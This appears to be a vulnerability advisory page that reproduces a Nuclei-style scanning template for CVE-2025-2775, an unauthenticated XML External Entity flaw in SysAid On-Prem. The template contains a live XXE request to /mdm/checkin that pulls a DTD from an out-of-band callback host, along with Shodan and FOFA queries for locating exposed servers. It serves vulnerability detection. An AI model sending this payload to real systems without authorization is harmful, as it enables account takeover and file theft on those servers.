漏洞描述
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives.
CVE-2025-2775: SysAid On-Prem <= 23.3.40 - XML External Entity
PoC代码[已公开]
id: CVE-2025-2775
info:
name: SysAid On-Prem <= 23.3.40 - XML External Entity
author: johnk3r
severity: critical
description: |
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives.
reference:
- https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
- https://documentation.sysaid.com/docs/24-40-60
classification:
epss-score: 0.51818
epss-percentile: 0.9783
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
cvss-score: 9.3
cve-id: CVE-2025-2775
cwe-id: CWE-611
metadata:
max-request: 1
vendor: sysaid
product: sysaid
shodan-query: http.favicon.hash:"1540720428"
fofa-query: icon_hash=1540720428
tags: cve,cve2025,oast,sysaid,xxe,kev,vkev
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /mdm/checkin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
%foo;
]>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
# digest: 4b0a0048304602210096f7d85a6d113dc8b6dc9f4c1a77f4473a76ff20fd944dd6a1b76a233d2349ae022100f80f282ee139cc6670363c90dff5dc44043d5429a6d34c0ddf99dc332db4c875:922c64590222798bb761d5b6d8e72950